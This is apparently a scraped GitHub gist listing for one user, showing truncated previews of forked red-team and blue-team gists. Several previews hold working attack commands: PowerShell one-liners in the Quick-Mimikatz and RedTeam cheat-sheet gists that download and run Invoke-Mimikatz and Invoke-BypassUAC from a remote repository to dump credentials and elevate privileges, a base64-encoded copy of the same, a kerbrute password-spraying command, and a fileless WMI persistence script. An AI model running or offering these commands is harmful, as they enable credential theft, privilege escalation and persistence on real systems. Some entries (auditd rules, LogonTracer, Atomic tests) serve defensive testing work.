This is an in-progress quick start install guide for NPK on Ubuntu 18.
From a new Ubuntu 18 box, install the essentials:
apt install unzip -y
apt install python3-pip -y
apt install jq -y
apt install npm -y
pip3 install awscli --upgrade —-user
Jesse Moore jessefmoore
jessefmoore
/ Quick-Mimikatz
Created
September 15, 2019 16:13
— forked from gfoss/Quick-Mimikatz
Quick Mimikatz
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
| #mimikatz [local] | |
| IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/7a39a55f127b1aeb951b3d9d80c6dc64500cacb5/data/module_source/credentials/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCreds; $m | |
| #encoded-mimikatz [local] | |
| powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvAEUAbQBwAGkAcgBlAC8ANwBhADMAOQBhADUANQBmADEAMgA3AGIAMQBhAGUAYgA5ADUAMQBiADMAZAA5AGQAOAAwAGMANgBkAGMANgA0ADUAMAAwAGMAYQBjAGIANQAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAa |
jessefmoore
/ NPK_quick_start.md
Created
September 2, 2019 16:10
— forked from 7MinSec/NPK_quick_start.md
Quick start guide to install NPK (https://github.com/Coalfire-Research/npk) on Ubuntu 18
jessefmoore
/ pwn-o-magic.md
Created
September 2, 2019 16:09
— forked from jivoi/pwn-o-magic.md
Pwning internal networks automagically
This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.
Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:
git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
jessefmoore
/ kerberos_attacks_cheatsheet.md
Created
August 29, 2019 02:03
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
jessefmoore
/ WMI-Persistence.ps1
Created
August 15, 2019 16:57
— forked from infosecn1nja/WMI-Persistence.ps1
Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime) | |
| # https://wikileaks.org/ciav7p1/cms/page_14587908.html | |
| <# | |
| .SYNOPSIS | |
| This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once. | |
| #> | |
| $EventFilterName = "Fileless WMI Persistence SystemUptime" |
jessefmoore
/ LogonTracer-Zero-to-Graph.md
Created
July 28, 2019 14:53
— forked from nepobef/LogonTracer-Zero-to-Graph.md
How to go from (almost) zero to viewing graphs with LogonTracer
The Readme for the LogonTracer project is missing a couple of steps so I'm jotting down all the kinks. I'm glossing over installing Debian into a VM.
There is little thought for security in this setup, all actions are taken as root user, if using in production you'll probably need to 'sudo' a few places.
I set this up in about 30 minutes using a VM in VMware workstation. I was able to connect to the Logontracer webpage from my host OS.
jessefmoore
/ RDP_Eavesdropping_Hijacking
Created
June 26, 2019 03:57
— forked from bohops/RDP_Eavesdropping_Hijacking
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RDP Eavesdropping and Hijacking | |
| ******************************* | |
| I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings | |
| that is not very new... | |
| =========== | |
| Inspiration | |
| =========== | |
| As you may already know... |
jessefmoore
/ audit.rules
Created
May 29, 2019 19:48
— forked from Neo23x0/audit.rules
Linux Auditd Best Practice Configuration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # IMPORTANT! | |
| # This gist has been transformed into a github repo | |
| # You can find the most recent version there: | |
| # https://github.com/Neo23x0/auditd | |
| # ___ ___ __ __ | |
| # / | __ ______/ (_) /_____/ / | |
| # / /| |/ / / / __ / / __/ __ / | |
| # / ___ / /_/ / /_/ / / /_/ /_/ / | |
| # /_/ |_\__,_/\__,_/_/\__/\__,_/ |
jessefmoore
/ AtomicTestsCommandLines.txt
Created
May 29, 2019 19:47
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __ | |
| / \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ | | |
| / _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| | | |
| / ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | | | |
| /_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_| | |
| [********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s) |
jessefmoore
/ RedTeam_CheatSheet.ps1
Created
May 29, 2019 19:46
— forked from jivoi/RedTeam_CheatSheet.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |